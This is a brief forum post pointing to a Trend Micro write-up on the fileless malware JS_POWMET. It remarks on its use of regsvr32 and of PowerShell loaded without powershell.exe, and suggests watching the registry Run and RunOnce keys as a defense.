Does the regsrv32 command line options look familiar folks? http://blog.trendmicro.com/trendlab...e/look-js_powmet-completely-fileless-malware/
there is several techniques to load powershell scripts without powershell.exe. This malware could be modified to do it.
You stop malware like this by using a security solution that monitors what is written to registry run and run once keys. Anything after that point is a losing effort.